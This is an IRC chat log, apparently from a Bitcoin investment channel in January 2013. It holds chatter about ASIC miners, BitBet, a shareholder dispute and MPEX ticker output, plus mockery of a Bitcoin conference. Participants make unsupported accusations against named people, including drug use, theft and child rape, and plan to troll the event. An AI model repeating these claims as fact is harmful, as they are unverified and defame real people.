06 15:46:18 1st April? Jan 06 15:46:28 http://bitbet.us/bet/27/ Jan 06 15:46:36 wow so its 20:1 that we don't have asics basically. Jan 06 15:47:06 well i don't think that can be a bet cause one person could easily manipulate it Jan 06 15:47:19 nah. i already am drawing up papers for a court date against usagi on behalf of the shareholders Jan 06 15:47:22 lolololol Jan 06 15:47:52 oh.. so make a bet that "usagi will be sentenced by the rota" then Jan 06 15:47:56 lol that should be interesting. Jan 06 15:48:13 jurov even so. Jan 06 15:48:17 better yet, usagi will decline to be heard Jan 06 15:48:39 there should be a mandatory serving Jan 06 15:48:42 you can't bet on what a one person will do dawg. Jan 06 15:50:37 man, what the fuck was wrong with usagi Jan 06 15:50:41 he just stole from everyone Jan 06 15:51:07 smickles said he has an executor to pay the shareholders Jan 06 15:52:02 i recall reading some drama on that point Jan 06 15:54:49 meh, usagi wishes he worked as hard as I do Jan 06 15:54:51 so did usagi actually steal? Jan 06 15:55:05 thestrin1puller: possibly Jan 06 15:55:05 or was he just dumb and lost a bunch of money and is trying to bluff his way out like a bad poker player Jan 06 15:55:08 he did a lot of lying Jan 06 15:55:14 everyone lies Jan 06 15:55:16 its not even poker bluffing Jan 06 15:55:27 poker bluffing is digging yourself a hole but meaning well Jan 06 15:55:38 what he did was worse Jan 06 15:57:45 he was dumb and lost a lot of money, is in denial about it. Jan 06 15:58:00 it's very little money and he has a lot of spare time, so arguing about it with him sort of feels like giving a perv a handjob Jan 06 15:58:56 quoted Jan 06 15:59:25 https://bitcointalk.org/index.php?topic=133147.msg1435649#msg1435649 wtf is wrong with people. Jan 06 15:59:29 mircea_popescu: yeah, but how the fuck did he do it Jan 06 15:59:40 "o, it's your job to prove that my stock generation rerun is legit" Jan 06 15:59:44 I mean, DMC "lost" money because nefario refused to do his job Jan 06 15:59:55 and you had a bad model Jan 06 16:00:02 Diablo-D3 nah, it lost money because you were stubborn and acted as if you can push the market. Jan 06 16:00:14 mircea_popescu: no, I did end up pushing the market Jan 06 16:00:18 it collapsed. Jan 06 16:00:21 lmao Jan 06 16:00:41 it wasnt quite what I intended, but I imagine I wasnt the only one left holding the bag on that Jan 06 16:00:53 I think its partly why nefario ran away Jan 06 16:01:09 hmmm Jan 06 16:01:13 what asic provider will be first? Jan 06 16:01:15 maybe, he just up and realised one day that he's running an exchange which pretty much has nothing wortyhwhile on it. Jan 06 16:01:20 Andck: asicminer Jan 06 16:01:28 mircea_popescu: probably Jan 06 16:01:28 Diablo-D3: they're the only one with actual chips? Jan 06 16:01:33 Anduck: yup Jan 06 16:01:33 Anduck well... bitbet says nobody before april Jan 06 16:01:34 i saw pics of them having them Jan 06 16:01:39 mircea_popescu .. :D Jan 06 16:01:47 friedcat should be shipping mine soon Jan 06 16:01:49 course that may be wishful thinking Jan 06 16:01:57 i think people are really underestimating the boxing of the chips in the circuit Jan 06 16:02:01 and _programming_ Jan 06 16:02:02 Diablo-D3 afaik they don't ship anything, they mione Jan 06 16:02:23 Diablo-D3: asic chips or built circuits? Jan 06 16:02:30 "BitInstant extremely poor design, lots of confusion, poor service" Jan 06 16:02:34 aghahajha SQUIRM SHREM!!! Jan 06 16:03:46 so is bitmit gone ? Jan 06 16:04:11 and speaking of which, who with actual provable fmcg/retail experience wants to partner to make a real bitcoinamazon ? Jan 06 16:05:01 you'd need a lot of sellers mp Jan 06 16:05:33 no. i just need one single person with good contacts that can get real discounts. Jan 06 16:05:43 the rest will follow. Jan 06 16:06:11 "An open letter to LTC-GLOBAL members who are downvoting BMF " eh there you go. Jan 06 16:06:15 usagi delivers. Jan 06 16:06:25 >:( where is mah money Jan 06 16:07:03 [09:02:02] Diablo-D3 afaik they don't ship anything, they mione Jan 06 16:07:14 they may not have enough to sell in the first generation Jan 06 16:07:16 usagi doesn't deliver money, he delivers words. Jan 06 16:07:18 but they intend on selling Jan 06 16:07:24 Diablo-D3 when did that happen ?! Jan 06 16:07:32 i thought they mine first. dunno. Jan 06 16:07:33 mircea_popescu: thats always BEEN the plan Jan 06 16:07:38 they are mine first Jan 06 16:07:47 it depends entirely on what happens when they turn the units on Jan 06 16:08:00 mircea_popescu: bitmit is still around Jan 06 16:08:16 if enough of them function flawlessly and they hit I think 15TH, then they can begin selling them Jan 06 16:08:24 https://bitcointalk.org/index.php?topic=134972.0 thestrin1puller Jan 06 16:08:37 Diablo-D3 did they say this somewhere ? Jan 06 16:08:45 mircea_popescu: yes! its in the goddamned contract Jan 06 16:08:58 ugh Jan 06 16:09:06 oh it's still down Jan 06 16:09:08 i didn't even know they had a contract. you mean post ? Jan 06 16:09:20 mircea_popescu: asicminer's shares have a contract, yes Jan 06 16:10:01 you mean on glbse ? Jan 06 16:10:27 yes, and soon to be on a new exchange as well Jan 06 16:11:14 another one? Jan 06 16:11:33 srsly, the chan topic does have a char limit Jan 06 16:12:11 kakobreklaa: congrats on bitbet Jan 06 16:12:12 lol Jan 06 16:12:14 kakobreklaa lolz Jan 06 16:12:22 don't listen to deez haters Jan 06 16:12:32 kakobreklaa: another what? Jan 06 16:12:49 ty, thestringpuller Jan 06 16:12:53 Diablo-D3 exchange Jan 06 16:13:01 Diablo-D3: will you receive ASIC processors or the actual circuits built around the asic chip?? Jan 06 16:13:05 its going to be one for friedcat's assets alone, including asicminer Jan 06 16:13:06 it's a huge difference Jan 06 16:13:12 [MPEX] [S.DICE] 1700 @ 0.00432328 = 7.3496 BTC [+] Jan 06 16:13:18 Anduck: you mean an actual finished product? yes. Jan 06 16:13:32 Anduck: the term you're looking for is "mounting a chip on a board" Jan 06 16:13:42 yes... Jan 06 16:13:50 well, they've got the board ready already, too??? Jan 06 16:13:53 nice by them Jan 06 16:14:33 I havent asked him about the boards, but afaik they were being produced concurrently Jan 06 16:14:48 fabbing boards is a lot easier, cheaper, and takes less time than fabbing chips Jan 06 16:15:04 ima start selling wide-eye drops. Jan 06 16:15:07 Optimism (tm) Jan 06 16:16:36 mircea_popescu: heh Jan 06 16:16:51 Anduck: hopefully, Ill have one in my hands by the end of this month Jan 06 16:18:01 Diablo-D3: big miner on campus Jan 06 16:18:09 Im only being sent one =P Jan 06 16:18:18 the funny part is, just one would replace an entire GPU farm Jan 06 16:18:41 Diablo-D3: remember to take pics Jan 06 16:18:49 GPU`s are a dying species Jan 06 16:18:56 Anduck: nope, Im going to take no pics just to piss people off Jan 06 16:19:12 bahh Jan 06 16:19:15 whatever Jan 06 16:19:19 PsychoticBoy: not really I got a gpu for 10 dollars and it will pay itself off pretty soon Jan 06 16:19:33 I plan to buy a bunch of fpga's for pennies on the dollar Jan 06 16:20:31 in that case yes Jan 06 16:21:26 I'm going to steal Diablo-D3's idea and use reusable power Jan 06 16:21:30 mwahahahaha Jan 06 16:21:43 you cant really steal the idea. Jan 06 16:21:49 I made the idea public for a reason. Jan 06 16:22:15 your master plaaan Jan 06 16:22:24 [MPEX] [S.MPOE] 5400 @ 0.00065894 = 3.5583 BTC [-] Jan 06 16:22:26 [MPEX] [S.MPOE] 8600 @ 0.00065384 = 5.623 BTC [-] Jan 06 16:22:34 I may end up just being hired by someone to make it happen Jan 06 16:23:26 Like mircea_popescu Jan 06 16:31:28 [MPEX] [S.DICE] 1279 @ 0.00432328 = 5.5295 BTC [+] Jan 06 16:31:29 [MPEX] [S.DICE] 1950 @ 0.00435363 = 8.4896 BTC [+] Jan 06 16:31:30 [MPEX] [S.DICE] 1200 @ 0.00435685 = 5.2282 BTC [+] Jan 06 16:31:32 [MPEX] [S.DICE] 1 @ 0.00435721 BTC [+] Jan 06 16:31:33 [MPEX] [S.DICE] 223 @ 0.00436871 = 0.9742 BTC [+] Jan 06 16:36:58 [MPEX] [S.DICE] 170 @ 0.00436871 = 0.7427 BTC [+] Jan 06 16:37:00 [MPEX] [S.DICE] 2300 @ 0.0043755 = 10.0637 BTC [+] Jan 06 16:37:01 [MPEX] [S.DICE] 48 @ 0.00439255 = 0.2108 BTC [+] Jan 06 16:37:22 i like that. Jan 06 16:37:59 Diablo-D3: reusable power - you think you're patenting _that_??? Jan 06 16:38:03 what is wrong with you americans Jan 06 16:39:46 he ain't patenting anything, he's just shootin da breez Jan 06 16:45:41 mircea_popescu you should patent mpex Jan 06 16:45:54 heh. Jan 06 16:46:57 then you can sue your competitors Jan 06 16:56:00 YESS Jan 06 16:56:05 fixed my pympex Jan 06 16:56:09 watch out world Jan 06 16:56:15 wd. Jan 06 17:05:22 [MPEX] [S.MPOE] 2484 @ 0.00065992 = 1.6392 BTC [+] Jan 06 17:05:24 [MPEX] [S.MPOE] 4304 @ 0.00065993 = 2.8403 BTC [+] Jan 06 17:09:37 Soooo, BitVPS, 1.5BTC dividend?? Jan 06 17:11:54 hmm Jan 06 17:12:08 I need to figure WTF is going on with BIB.BVPS Jan 06 17:12:43 I dumped that shit Jan 06 17:12:51 last month Jan 06 17:13:01 seemed like driver was alseep at the switch Jan 06 17:13:09 it traded on GLBSE Jan 06 17:13:18 so not sure how you dumped it last month Jan 06 17:13:20 ah Jan 06 17:13:24 S.BVPS Jan 06 17:13:24 ;) Jan 06 17:13:26 heh Jan 06 17:13:28 got it Jan 06 17:13:52 serious though, what happened to the div? Jan 06 17:13:58 did revenue drop? Jan 06 17:14:24 95% Jan 06 17:14:46 rg is MIA ? Jan 06 17:14:59 ;;seen rg Jan 06 17:14:59 rg was last seen in #bitcoin-assets 3 weeks, 0 days, 17 hours, 36 minutes, and 25 seconds ago: good times Jan 06 17:15:16 not encouraging Jan 06 17:15:41 well Jan 06 17:15:54 JWU42: whats wrong with him being away? Jan 06 17:16:13 I said "not encouraging" Jan 06 17:16:19 hmmm Jan 06 17:16:26 didnt he say he's quite busy with his new job Jan 06 17:16:29 as in him not being here (as he used to be) Jan 06 17:16:32 ahh Jan 06 17:16:34 ok Jan 06 17:16:47 maybe him being absent means more time "working" Jan 06 17:16:50 ;) Jan 06 17:17:04 ye Jan 06 17:17:40 i though rg isn't in charge anymore Jan 06 17:17:48 Namijes Jan 06 17:17:52 and some people Jan 06 17:18:11 u may be right Jan 06 17:18:55 i need someone in the usa to send sms for me Jan 06 17:19:20 arij, namjies, atleast Jan 06 17:19:24 there was someone else, too Jan 06 17:19:26 [MPEX] [S.DICE] 1152 @ 0.00439255 = 5.0602 BTC [+] Jan 06 17:19:27 [MPEX] [S.DICE] 1518 @ 0.00440251 = 6.683 BTC [+] Jan 06 17:19:29 [MPEX] [S.DICE] 2000 @ 0.00443223 = 8.8645 BTC [+] Jan 06 17:19:30 [MPEX] [S.DICE] 1300 @ 0.00444827 = 5.7828 BTC [+] Jan 06 17:19:31 [MPEX] [S.DICE] 2909 @ 0.00445982 = 12.9736 BTC [+] Jan 06 17:19:32 [MPEX] [S.DICE] 2448 @ 0.00449166 = 10.9956 BTC [+] Jan 06 17:19:33 [MPEX] [S.DICE] 5845 @ 0.00449357 = 26.2649 BTC [+] Jan 06 17:19:53 what you need? Jan 06 17:20:09 see pm Jan 06 17:20:13 !ticker S.DICE Jan 06 17:20:14 [MPEX:S.DICE] 1day: 0.00430002 / 0.00443282 / 0.00456817 (128348 shares, 568.94 BTC), 30day: 0.0014 / 0.00333114 / 0.0048 (13819049 shares, 46,033.20 BTC) Jan 06 17:21:05 ;;ident kakobreklaa Jan 06 17:21:05 Nick 'kakobreklaa', with hostmask 'kakobreklaa!~T42@89-212-41-49.static.t-2.net', is not identified. Jan 06 17:21:42 ;;ident kakobreklaa Jan 06 17:21:43 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Jan 06 17:21:47 ;;ident kakobrekla Jan 06 17:21:48 Nick 'kakobrekla', with hostmask 'kakobrekla!~T42@89-212-41-49.static.t-2.net', is identified as user kakobrekla, with GPG key id 27AF75321F2489E8, key fingerprint 27C3CE9A20851312F086268C27AF75321F2489E8, and bitcoin address None Jan 06 17:24:08 ;;rate Bugpowder 1 a wonderful sms provider Jan 06 17:24:09 Rating entry successful. Your rating of 1 for user Bugpowder has been recorded. Jan 06 17:25:11 !ticker S.DICE Jan 06 17:25:13 [MPEX:S.DICE] 1day: 0.00430002 / 0.00443295 / 0.00456817 (127185 shares, 563.81 BTC), 30day: 0.0014 / 0.00333114 / 0.0048 (13819049 shares, 46,033.20 BTC) Jan 06 17:26:28 ;;ticker Jan 06 17:26:28 BTCUSD ticker | Best bid: 13.45461, Best ask: 13.49800, Bid-ask spread: 0.04339, Last trade: 13.45461, 24 hour volume: 18155.80396150, 24 hour low: 13.31500, 24 hour high: 13.52999, 24 hour vwap: 13.44816 Jan 06 17:59:32 [MPEX] [S.MPOE] 546 @ 0.00065993 = 0.3603 BTC [+] Jan 06 17:59:34 [MPEX] [S.MPOE] 14554 @ 0.00065999 = 9.6055 BTC [+] Jan 06 17:59:38 trailer park boys Jan 06 18:10:58 [MPEX] [S.MPOE] 950 @ 0.00065384 = 0.6211 BTC [-] Jan 06 18:11:00 [MPEX] [S.MPOE] 14464 @ 0.00065325 = 9.4486 BTC [-] Jan 06 18:11:01 [MPEX] [S.MPOE] 2836 @ 0.00064202 = 1.8208 BTC [-] Jan 06 18:12:00 thestringpuller: Bubbles is my hero. Jan 06 18:13:51 http://news.ycombinator.com/item?id=5016580 Jan 06 18:15:08 ;;bc,24hprc Jan 06 18:15:12 13.41 Jan 06 18:22:47 [MPEX] [S.MPOE] 964 @ 0.00064202 = 0.6189 BTC [-] Jan 06 18:22:48 [MPEX] [S.MPOE] 6180 @ 0.0006417 = 3.9657 BTC [-] Jan 06 18:22:49 [MPEX] [S.MPOE] 2392 @ 0.00064058 = 1.5323 BTC [-] Jan 06 18:32:52 ;;ticker Jan 06 18:32:53 BTCUSD ticker | Best bid: 13.49991, Best ask: 13.49998, Bid-ask spread: 0.00007, Last trade: 13.49998, 24 hour volume: 17547.94335078, 24 hour low: 13.32066, 24 hour high: 13.52999, 24 hour vwap: 13.45388 Jan 06 18:33:02 !ticker S.DICE Jan 06 18:33:04 [MPEX:S.DICE] 1day: 0.00430002 / 0.00442786 / 0.00456817 (114320 shares, 506.19 BTC), 30day: 0.0014 / 0.00333114 / 0.0048 (13819049 shares, 46,033.20 BTC) Jan 06 18:49:46 [MPEX] [S.DICE] 1755 @ 0.00449357 = 7.8862 BTC [+] Jan 06 18:50:55 [MPEX] [S.DICE] 2065 @ 0.0045 = 9.2925 BTC [+] Jan 06 18:52:32 [MPEX] [S.MPOE] 7109 @ 0.00064058 = 4.5539 BTC [-] Jan 06 18:52:34 [MPEX] [S.MPOE] 7791 @ 0.00063975 = 4.9843 BTC [-] Jan 06 19:06:49 mod6: hey mang Jan 06 19:07:25 how come no one gets mad at Bugpowder for using the channel as a realtime ticker :P Jan 06 19:10:57 Thanks what its there for! Jan 06 19:14:24 :P Jan 06 19:25:46 http://trilema.com/2013/bitbet-r-us/ Jan 06 19:44:09 [MPEX] [S.MPOE] 446 @ 0.00065999 = 0.2944 BTC [+] Jan 06 19:44:10 [MPEX] [S.MPOE] 12854 @ 0.00066 = 8.4836 BTC [+] Jan 06 19:49:38 mircea_popescu: i want in on the BTCZon Jan 06 19:49:47 http://news.ycombinator.com/reply?id=5016890&whence=%69%74%65%6d%3f%69%64%3d%35%30%31%36%35%38%30 Jan 06 19:49:52 what the fuck is with this idiot ? Jan 06 19:50:14 provide a better link Jan 06 19:50:15 jesus, i am sick and tired of the internet opening up a global venue for each single imbecile who'd normally be locked away somewherhe among four walls. Jan 06 19:50:18 that doesn't make me have to log in Jan 06 19:50:22 i can't, graham doesn't grok interweb urls. Jan 06 19:50:30 This betting site has a really stupid betting system. It appears that the amount of money you receive isn't based on a pricing of the bet, as is done on all real prediction markets, but based on a simple payout of all the bets received on the other side of the bet by the end of the bet date. This system has two practical consequences: 1. You can't determine the markets current probability estimates from the current sta Jan 06 19:50:30 te of the market, as you can with priced markets. 2. You should never bet until the last second so you can know the odds for the bet. In fact, it would make sense to create a sniping bot that would programmatically calculate the odds, compare them to your probability estimate, and only make the bet if it is favorable. There is another site called Bets of Bitcoin (http://betsofbitco.in/) that has similarly dumb rules. Jan 06 19:50:45 apparently, mutual betting is dumb. so sayz anonymousdicwad on unheardofsite Jan 06 19:50:47 thus therefore! Jan 06 19:51:11 "I have to agree, I was trying to work out how the odds are calculated and it makes no sense. Why not copy what Betfair or Intrade or something like that do." Jan 06 19:51:23 heck, copying what betfair does got him all the way through highschool in rome wisconsin Jan 06 19:51:36 and he's about to graduate the local agricaltural college too! Jan 06 19:51:37 you're in flames about this one Jan 06 19:51:41 lol Jan 06 19:51:54 i've made the mistake of reading the stuff raw Jan 06 19:51:59 normally i have people digesting it for me. Jan 06 19:52:06 i guess i leave a sheltered interlife ;/ Jan 06 19:53:07 you're from romania...that's like telling the street urchin who turned into a prince he doesn't know "street life" Jan 06 19:54:16 huh ? Jan 06 19:54:55 didn't you live through a bloody revolution? Jan 06 19:55:00 how can you be sheltered? Jan 06 19:55:37 lol Jan 06 19:55:40 apparently you caN Jan 06 20:08:50 BTCZON lol Jan 06 20:15:30 ;;bc,stats Jan 06 20:15:30 Current Blocks: 215438 | Current Difficulty: 2979636.6169381 | Next Difficulty At Block: 215711 | Next Difficulty In: 273 blocks | Next Difficulty In About: 1 day, 18 hours, 41 minutes, and 39 seconds | Next Difficulty Estimate: 3235311.85244907 | Estimated Percent Change: 8.58075223192 Jan 06 20:22:57 [MPEX] [S.DICE] 387 @ 0.00452292 = 1.7504 BTC [+] Jan 06 20:22:58 [MPEX] [S.DICE] 2800 @ 0.00455337 = 12.7494 BTC [+] Jan 06 20:23:00 [MPEX] [S.DICE] 327 @ 0.00456817 = 1.4938 BTC [+] Jan 06 20:23:01 [MPEX] [S.DICE] 2210 @ 0.00457248 = 10.1052 BTC [+] Jan 06 20:23:02 [MPEX] [S.DICE] 952 @ 0.00458276 = 4.3628 BTC [+] Jan 06 20:24:17 [MPEX] [S.DICE] 3698 @ 0.00458276 = 16.947 BTC [+] Jan 06 20:24:19 [MPEX] [S.DICE] 1302 @ 0.00458861 = 5.9744 BTC [+] Jan 06 20:52:56 [MPEX] [S.DICE] 1448 @ 0.00458861 = 6.6443 BTC [+] Jan 06 20:52:57 [MPEX] [S.DICE] 302 @ 0.00459989 = 1.3892 BTC [+] Jan 06 21:02:43 http://bitcoingamblin.com/ Jan 06 21:02:50 competition heating up Jan 06 21:03:22 o, comic sans, aint that cute Jan 06 21:04:23 hahaha Jan 06 21:04:46 and a dancing baby Jan 06 21:04:56 havent seen that one in years now Jan 06 21:04:58 :) Jan 06 21:07:01 ya lol Jan 06 21:08:21 http://bitcoingamblin.com/bitcoin.gif Jan 06 21:08:24 pretty good shit Jan 06 21:08:49 MADE IN THE AMERICA. CODED BBY MY BROTHER. lol Jan 06 21:14:45 themerica Jan 06 21:14:51 :D Jan 06 21:18:09 http://trilema.com/2013/the-rogue-state-saga-continues/ Jan 06 21:18:15 here's a little bit of a breaking news item. Jan 06 21:28:01 bitcoingamblin.com, cute... anyone noticed pirate hat? Jan 06 21:29:07 ya lol Jan 06 21:31:48 19:18 < mircea_popescu> http://trilema.com/2013/the-rogue-state-saga-continues/ <<< we're boned Jan 06 21:32:00 dun dun dun Jan 06 21:38:02 [MPEX] [S.DICE] 2298 @ 0.00449327 = 10.3255 BTC [-] Jan 06 21:38:02 http://blockchain.info/address/12uArTbz4JnEZZq5Yk5y7GvXPu6tdHTDaf Jan 06 21:38:02 Public Note: The ghost of Satoshi will rip off your head and crap in your throat. Jan 06 21:38:02 Grumpy cat is doing much better Jan 06 21:38:34 http://trilema.com/2013/i-would-like-to-address-that-question-at-this-time/ << if anyone actually has a ycombinator acct dump that there. Jan 06 21:42:53 Bugpowder: does blockchain display (what are they called) coinbase messages now? Jan 06 21:44:59 I have a friend that is finally ready to buy some coins $5k worth. What's the best way right now? I used Tangible Cryptography in the past, and was great. Not sure if he will accept new clients right now though. Jan 06 21:45:15 smickles, I dunno.. there are some messages there. Jan 06 22:02:06 [MPEX] [S.MPOE] 7586 @ 0.00066 = 5.0068 BTC [+] Jan 06 22:09:09 smickles: Jan 06 22:09:31 i may need to liquidate some assets lemme know if you'll be around tonight Jan 06 22:12:50 thestringpuller: what time? Jan 06 22:13:04 I can certainly make an appointment Jan 06 22:20:51 [MPEX] [S.DICE] 1650 @ 0.00444605 = 7.336 BTC [-] Jan 06 22:20:52 [MPEX] [S.DICE] 3350 @ 0.00445237 = 14.9154 BTC [+] Jan 06 22:37:06 [MPEX] [S.DICE] 573 @ 0.00445237 = 2.5512 BTC [+] Jan 06 22:40:58 [MPEX] [S.DICE] 1344 @ 0.00459989 = 6.1823 BTC [+] Jan 06 22:40:59 [MPEX] [S.DICE] 550 @ 0.00462446 = 2.5435 BTC [+] Jan 06 22:41:01 [MPEX] [S.DICE] 1050 @ 0.00463124 = 4.8628 BTC [+] Jan 06 22:41:02 [MPEX] [S.DICE] 2056 @ 0.00463274 = 9.5249 BTC [+] Jan 06 22:50:58 ;;seen jurov Jan 06 22:50:59 jurov was last seen in #bitcoin-assets 1 hour, 22 minutes, and 57 seconds ago: bitcoingamblin.com, cute... anyone noticed pirate hat? Jan 06 22:51:16 here Jan 06 22:51:47 jurov: just made a deposit, sent further to mpex? Jan 06 22:54:38 oh, i guess has no confirmation yet :( Jan 06 22:54:58 FabianB_,done. i trust you won't doublespend me ;) Jan 06 22:55:26 jurov: thx Jan 06 22:55:30 ;;view 12732 Jan 06 22:55:30 #12732 Sat Jan 5 16:43:31 2013 jurov SELL 1.0 BTC @ 1 MPExBTC (Fast MPEx funding. Fixed fee 0.1BTC) Jan 06 22:55:45 coinbr clients free ofc Jan 06 22:56:12 :) Jan 06 23:15:36 here comes the amir's bitcoin conference: http://unsystem.net/ Jan 06 23:20:38 wonder why bitcoin fundation is not doing anything like that, leaving genjix on rampage Jan 06 23:35:45 presumably the plan is to delay acceptance until the client/protocol is ready Jan 06 23:37:03 letting fucktards and assgoblins run PR has been deemed the best way to keep us clear of the mainstream Jan 06 23:38:05 I like the pick of amir on that page though, looks like he's trying to make a facepalm but can't even manage that Jan 06 23:38:22 pic* Jan 06 23:39:20 THIS IS THE SIDE OF MY HEAD, THERE ARE MANY HEADSIDES LIKE IT BUT THIS ONE IS MINE Jan 06 23:40:13 wait wait Jan 06 23:40:14 http://en.wikipedia.org/wiki/Amir_Taaki Jan 06 23:40:21 he is a sw developer Jan 06 23:40:30 and bitcoins are generated by math. Jan 06 23:40:40 s/math/maff Jan 06 23:40:52 "Taaki is a speaker of Esperanto, which he promotes as an auxiliary country-neutral international language to preserve local languages. " Jan 06 23:41:19 If I wanted to claim to be a speaker of a language, I would pick one which nobody else would be able to confirm that I can or cannot speak Jan 06 23:42:01 I find what you said ironic Jan 06 23:42:08 esperanto is the most widespread artifical language Jan 06 23:42:18 do you speak it? Jan 06 23:42:24 maff is hard Jan 06 23:42:36 do you know anyone that speaks it? Jan 06 23:42:44 hm, that bitcointalk thread should be in teh wiki ;> Jan 06 23:48:25 mircea_popescu: didn't u want to spring scrub K.KBRL? Jan 06 23:54:14 http://interviews.slashdot.org/story/11/06/22/1737237/Amir-Taaki-Answers-Your-Questions-About-Bitcoin this is lulzy Jan 06 23:54:26 FabianB_, that's successor of B.BITB Jan 06 23:55:04 My team is already in contact with SWIFT which has operated for 30 years and is the backbone of international money transfer for over 9000 banks. Jan 06 23:55:20 The sooner they are regulated, the sooner users can have legal assurances that merchants are liable for their operations. The negligence seen at MTGox would never have happened in a regulated market. Jan 06 23:55:47 jurov: heh, ic Jan 06 23:55:54 dub, genjix said *that*??? Jan 06 23:56:00 yes Jan 06 23:56:28 but also, anon is legion etc Jan 06 23:57:03 im thinking multiple personalitly disorder Jan 06 23:57:35 we should hatch a plan to troll that conference. in full force at least from romania, slovakia and slovenia :) Jan 06 23:57:46 probably stimulant abuse Jan 06 23:58:08 Bugpowder: yeah that face has meth written all over it Jan 06 23:59:01 maybe even evoorhees caould be persuaded to take part Jan 06 23:59:36 ok Jan 06 23:59:52 community will pay for the trave and accomodation costs Jan 06 23:59:54 we troll. Jan 07 00:00:40 The point to Bitcoin is that you can choose your own level of trust in an external service. One of our group's members, Patrick Strateman, came up with a scheme whereby a wallet could be recovered algorithmically using an email and a password. Jan 07 00:00:50 so much funny right there Jan 07 00:02:02 turns out patricks mail server let someone 'recover' all of bitcoinicas wallet Jan 07 00:07:07 I went to fill in the Paypal form, spent 10 mins signing up to an account, entering all my very personal details and my card was rejected. Jan 07 00:10:18 paypal for a bitcoin conference? Jan 07 00:13:15 my god they collected such a luminaries: https://progressbar.sk/calendar/international-bitcoin-day-2013 Jan 07 00:14:21 dub, you can't pay with your library card. Jan 07 00:14:25 indeed i'll collect funds for mpoe-pr to travel there Jan 07 00:15:12 yes Jan 07 00:16:45 amir is possibly adopting this guys approach to education https://www.youtube.com/watch?v=vRwIrbK8KDI Jan 07 01:47:39 [MPEX] [S.DICE] 2050 @ 0.00460243 = 9.435 BTC [-] Jan 07 02:06:08 [MPEX] [S.DICE] 1482 @ 0.00455449 = 6.7498 BTC [-] Jan 07 02:09:32 [MPEX] [S.MPOE] 5000 @ 0.00063976 = 3.1988 BTC [-] Jan 07 02:09:33 [MPEX] [S.MPOE] 7909 @ 0.00063975 = 5.0598 BTC [-] Jan 07 02:09:35 [MPEX] [S.MPOE] 6153 @ 0.00063899 = 3.9317 BTC [-] Jan 07 02:18:06 [MPEX] [S.DICE] 1468 @ 0.00446855 = 6.5598 BTC [-] Jan 07 02:21:44 [MPEX] [S.DICE] 1000 @ 0.00444 = 4.44 BTC [-] Jan 07 02:27:11 ;;seen smickles Jan 07 02:27:12 smickles was last seen in #bitcoin-assets 4 hours, 14 minutes, and 4 seconds ago: I can certainly make an appointment Jan 07 02:27:18 smickles Jan 07 02:27:24 I's sorry I fell asleep Jan 07 02:30:27 ;;seen mod6 Jan 07 02:30:28 mod6 was last seen in #bitcoin-assets 8 hours, 18 minutes, and 22 seconds ago: thestringpuller: Bubbles is my hero. Jan 07 02:43:07 [MPEX] [S.DICE] 1850 @ 0.00444 = 8.214 BTC [-] Jan 07 02:51:45 yes vragnaroda speaks perfect esperanto Jan 07 03:06:44 does he eat beans? Jan 07 03:10:33 sounds more like a vindaloo man Jan 07 03:12:36 well beans are good for your heart Jan 07 03:17:16 thestringpuller: yo Jan 07 03:27:22 pigeons: so are you an expert on pigeons? Jan 07 03:32:18 thestringpuller: nope Jan 07 03:34:06 [MPEX] [S.DICE] 2400 @ 0.00444878 = 10.6771 BTC [+] Jan 07 03:42:41 FabianB_ prolly eventually lol Jan 07 03:42:59 kakobrekla Jan 07 03:44:56 [MPEX] [S.DICE] 1050 @ 0.00462278 = 4.8539 BTC [+] Jan 07 03:44:58 [MPEX] [S.DICE] 522 @ 0.00462375 = 2.4136 BTC [+] Jan 07 03:45:44 the idea that esperanto helps local languages is pretty good. nothing like something that really sucks as a standard to keep internationalisation at bay. Jan 07 03:46:46 dub wtf ?! the negligence seen at mtgox happens every month with irl banks. Jan 07 03:46:50 the diff is mtgox fixed it. Jan 07 03:50:04 also, who is Cody R Wilson ? Jan 07 03:50:22 Mike Gogulski (Bitcoin laundry) ? wtf is that! i need to knoe Jan 07 03:52:15 !ticker s.dice Jan 07 03:52:16 [MPEX:S.DICE] 1day: 0.00430002 / 0.00446669 / 0.00463274 (82268 shares, 367.47 BTC), 30day: 0.0014 / 0.00333481 / 0.0048 (13847718 shares, 46,179.57 BTC) Jan 07 03:56:23 mircea_popescu: gogulski is from nostate.com Jan 07 03:56:33 he used to be in irc all the time but a few years ago Jan 07 03:56:37 i like these unheard of sites, i learn so very much Jan 07 03:56:39 wtf is nostate.com Jan 07 03:56:52 i think it was the mybitcoin nonsense when he started saying pfffh Jan 07 03:57:23 Fixing the “100% CPU and no useful output” imklog+rsyslog kernel logging problem on Ubuntu guests under Xen PV Jan 07 03:57:30 ok, so a tech guy ? Jan 07 03:57:33 he bought a mixer and the motto was "get your bitcoins whiter than white" Jan 07 03:57:40 root@nyancat:/var/log# tail /var/log/kern.log Jan 07 03:57:44 wait a fucking second. nyancat ? Jan 07 03:58:09 nothing to do with usagi ;) Jan 07 03:59:08 he used to maintain a bitcoin wordpress shopping cart plugin Jan 07 03:59:21 [MPEX] [S.DICE] 1250 @ 0.00462375 = 5.7797 BTC [+] Jan 07 03:59:29 a ok Jan 07 04:00:37 he's mostly known for renouncing us citizenship for a "not a citizen under the blessing of slovakia" card Jan 07 04:02:27 mircea_popescu: the shitheads responsible for bitcoinica calling mtgox negligent is funny enough by itself Jan 07 04:02:50 it is. Jan 07 04:03:08 i mean, they were, yes, but not much moreso than your average bank. whereas the average bank still is, 10-15 years later Jan 07 04:03:19 and after 100`000x as many ownages, exploits and general mayhem Jan 07 04:03:21 gotta give em that at least Jan 07 04:04:22 pigeons slovakia does that ? cool. Jan 07 04:05:18 is cody the gun printing guy? Jan 07 04:05:37 i dunno. is he ? Jan 07 04:05:44 i closed tab and cannot be fucked finding link Jan 07 04:06:08 the gun printing guy was listed as a speaker iirc Jan 07 04:06:41 he is "wiki weapon" guy, which is in some ways quite behind the other gun printing projects Jan 07 04:06:53 so basically... a guy that's been out of the game since about before it started, taaki and a gun printing guy. Jan 07 04:06:57 they need plato i guess. Jan 07 04:07:07 or wait, what's the guy who had a show where he used cameras in demo mode ? Jan 07 04:07:24 cause the new bitcoin ragazine dood is there. Jan 07 04:07:28 that was bruce I think Jan 07 04:07:39 the bitciontv slash child rapist dude Jan 07 04:08:36 spent the last few weeks erasing my memory Jan 07 04:08:56 could be wrong Jan 07 04:09:34 oh course who they need is nefario Jan 07 04:10:03 People that make the most rediculous claims will get the most press, every time Jan 07 04:10:07 happens in every field Jan 07 04:10:20 for a while at least Jan 07 04:10:50 dreamhost has pictures of their big tubes in their ad Jan 07 04:10:58 Bugpowder i don't see 